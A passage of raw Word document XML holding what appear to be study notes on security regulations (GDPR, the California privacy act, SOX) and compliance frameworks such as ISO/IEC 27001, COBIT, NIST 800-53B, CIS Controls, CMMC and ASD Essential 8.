        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>GDPR</w:t>
      </w:r>
      <w:r w:rsidR="004F070C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> – general Data Protection Regulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A97BF51" w14:textId="662C7689" w:rsidR="004F070C" w:rsidRDefault="004F070C" w:rsidP="004F070C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Data protection and privacy law in the European Union (EU) and the European Economic Area (EEA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EF78F4" w14:textId="4B737789" w:rsidR="004F070C" w:rsidRDefault="004F070C" w:rsidP="004F070C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Controllers and processors of personal data must put in place appropriate technical and organizational measures to implement the data protection principles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B37505F" w14:textId="727187B3" w:rsidR="00FD76E4" w:rsidRDefault="00FD76E4" w:rsidP="00FD76E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>CPPA</w:t>
      </w:r>
      <w:r w:rsidR="00566BD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> – California Consumer Privacy Act</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8CE596" w14:textId="1DF09A00" w:rsidR="004F070C" w:rsidRDefault="00566BD8" w:rsidP="004F070C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Intended to enhance privacy rights and consumer protection for residents of California, United States.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F331997" w14:textId="411D4F21" w:rsidR="00566BD8" w:rsidRDefault="00566BD8" w:rsidP="004F070C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Companies that become victims of data theft or other data security breaches can be ordered in civil class action lawsuits to pay statutory damages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE18841" w14:textId="02E9506B" w:rsidR="00566BD8" w:rsidRDefault="00566BD8" w:rsidP="004F070C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Liability may also apply in respect of businesses in overseas countries who ship items into California</w:t>
      </w:r>
      <w:r w:rsidR="00740D5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4F431C" w14:textId="6574BDB0" w:rsidR="00FD76E4" w:rsidRDefault="00FD76E4" w:rsidP="00FD76E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>SOX</w:t>
      </w:r>
      <w:r w:rsidR="00740D5F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Sarbanes-Oxley Act of 2002</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285943B7" w14:textId="7A34BCE3" w:rsidR="00740D5F" w:rsidRDefault="00740D5F" w:rsidP="00740D5F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Us federal law that mandates certain practices in financial record keeping and reporting for corporations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF6AEF4" w14:textId="1D1A7574" w:rsidR="00740D5F" w:rsidRDefault="00740D5F" w:rsidP="00740D5F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Requires strong internal control processes over the IT infrastructure and applications that house the financial information that flows into its financial </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>reports to enable them to make timely disclosures to the public if a breach were to occur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1948ED" w14:textId="77777777" w:rsidR="00740D5F" w:rsidRDefault="00740D5F" w:rsidP="00740D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58A7FA67" w14:textId="0C5A7F7C" w:rsidR="005B69CD" w:rsidRDefault="005B69CD" w:rsidP="00740D5F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Auditing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAB3D97" w14:textId="7B77F87C" w:rsidR="005B69CD" w:rsidRDefault="005B69CD" w:rsidP="005B69CD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>All comes down to business needs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582810E0" w14:textId="77777777" w:rsidR="00C957C3" w:rsidRDefault="00C957C3" w:rsidP="00C957C3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72DCFAD9" w14:textId="77777777" w:rsidR="00C957C3" w:rsidRDefault="00C957C3" w:rsidP="00C957C3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35310857" w14:textId="01FCC9C8" w:rsidR="00C957C3" w:rsidRPr="00C957C3" w:rsidRDefault="00C957C3" w:rsidP="00C957C3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Frameworks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C833B1" w14:textId="74EB709F" w:rsidR="00DD2C90" w:rsidRDefault="00C957C3" w:rsidP="00C957C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ISO/IEC 27000 – International Organization for Standardization and the International Electrotechnical Commission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1BE4B8" w14:textId="419BDF8F" w:rsidR="00C957C3" w:rsidRDefault="00C957C3" w:rsidP="00C957C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Deliberately broad in scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06926906" w14:textId="1DF5522B" w:rsidR="00C957C3" w:rsidRDefault="00C957C3" w:rsidP="00C957C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Covering more than just privacy, confidentiality, and</w:t>
      </w:r>
      <w:r w:rsidR="00CB3C9C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> IT/technical/cyber issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8FAB5F" w14:textId="73CCCAA9" w:rsidR="00CB3C9C" w:rsidRDefault="00CB3C9C" w:rsidP="00C957C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Applicable to organizations of all shapes and sizes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3FF576" w14:textId="0A4B7E7A" w:rsidR="00CB3C9C" w:rsidRDefault="009C7DF6" w:rsidP="00C957C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ISO/IEC 27001</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62705B7A" w14:textId="2B818B17" w:rsidR="009C7DF6" w:rsidRDefault="009C7DF6" w:rsidP="009C7DF6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Information technology – Security Techniques – Information security management systems – Requirements (GUIDELINES)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682549D0" w14:textId="074609F6" w:rsidR="009C7DF6" w:rsidRDefault="009C7DF6" w:rsidP="009C7DF6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ISO/IEC 27002</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7695AF24" w14:textId="231D0360" w:rsidR="009C7DF6" w:rsidRDefault="009C7DF6" w:rsidP="009C7DF6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Code of practice for information security records.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F48335" w14:textId="2BA793F6" w:rsidR="00C957C3" w:rsidRDefault="00C957C3" w:rsidP="00C957C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>COBIT</w:t>
      </w:r>
      <w:r w:rsidR="009C7DF6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Control Objectives for Information and Related Technologies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051A8EF4" w14:textId="2CE03964" w:rsidR="009C7DF6" w:rsidRDefault="009C7DF6" w:rsidP="009C7DF6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Created by ISACA for IT management and IT governance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D5F8C7" w14:textId="6357DF51" w:rsidR="009C7DF6" w:rsidRDefault="009C7DF6" w:rsidP="009C7DF6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Business focused and defined a set of generic processes for the management of IT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7107DF74" w14:textId="3B3016EB" w:rsidR="00C957C3" w:rsidRDefault="00C957C3" w:rsidP="00C957C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>NIST</w:t>
      </w:r>
      <w:r w:rsidR="009C7DF6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> – National Institute of Standards and Technology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0007E831" w14:textId="3866AD6A" w:rsidR="009C7DF6" w:rsidRDefault="009C7DF6" w:rsidP="009C7DF6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Catalog of security and privacy controls for all U.S. federal information systems except those related to national security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CEDD3C" w14:textId="7F141FEC" w:rsidR="009C7DF6" w:rsidRDefault="009C7DF6" w:rsidP="009C7DF6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Agencies are expected to be compliant with NIST security standards and guidelines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3CDD8D" w14:textId="61898A98" w:rsidR="009C7DF6" w:rsidRDefault="009C7DF6" w:rsidP="009C7DF6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>NIST Special Publication 800-53B provides a set of baseline security controls and privacy controls for information systems and organizations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A87EA8E" w14:textId="1A54076A" w:rsidR="00C957C3" w:rsidRDefault="00C957C3" w:rsidP="00C957C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>CIS</w:t>
      </w:r>
      <w:r w:rsidR="009C7DF6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Center for Internet Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232FFA31" w14:textId="2B7A2623" w:rsidR="009C7DF6" w:rsidRDefault="009C7DF6" w:rsidP="009C7DF6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Set of 18 prioritized safeguards to mitigate the most prevalent cyber-attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474C9486" w14:textId="0AAFDE45" w:rsidR="009C7DF6" w:rsidRDefault="009C7DF6" w:rsidP="009C7DF6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>A defense-in-depth model to help prevent and detect malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BDD8BD3" w14:textId="0464EAF8" w:rsidR="009C7DF6" w:rsidRDefault="009C7DF6" w:rsidP="009C7DF6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Offers a free, hosted software product called the CIS Controls Self Assessment Tool (CIS-CSAT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75926BEC" w14:textId="7102D395" w:rsidR="00C957C3" w:rsidRDefault="00C957C3" w:rsidP="00C957C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>CMMC</w:t>
      </w:r>
      <w:r w:rsidR="009C7DF6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Cybersecurity Maturity Model Certification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFD0AD5" w14:textId="1219ECAC" w:rsidR="009C7DF6" w:rsidRDefault="009C7DF6" w:rsidP="009C7DF6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">A training, certification, and </w:t>
      </w:r>
      <w:r w:rsidR="00DD6603">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>third-party</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> assessment program of cybersecurity in the US government Defense Industrial Base</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64217184" w14:textId="3B54DDF3" w:rsidR="009C7DF6" w:rsidRDefault="009C7DF6" w:rsidP="009C7DF6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Requires a </w:t>
      </w:r>
      <w:r w:rsidR="00DD6603">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>third-party</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> assessor to verify the cybersecur</w:t>
      </w:r>
      <w:r w:rsidR="00DD6603">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ity maturation level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E88A563" w14:textId="5E297A16" w:rsidR="00DD6603" w:rsidRDefault="00DD6603" w:rsidP="009C7DF6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>5 levels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A480EB" w14:textId="71226DE7" w:rsidR="00DD6603" w:rsidRDefault="00DD6603" w:rsidP="00DD6603">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Performed, Documented, Managed, Reviewed, Optimizing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147D193B" w14:textId="4208BA4A" w:rsidR="00715083" w:rsidRDefault="00715083" w:rsidP="00715083">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">ASD Essential 8 - </w:t>
      </w:r>
      <w:r w:rsidRPr="00715083">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Australian Cyber Security Centre Essential Eight Maturity Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D87A8D6" w14:textId="27CBCDC9" w:rsidR="00715083" w:rsidRDefault="00715083" w:rsidP="00715083">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
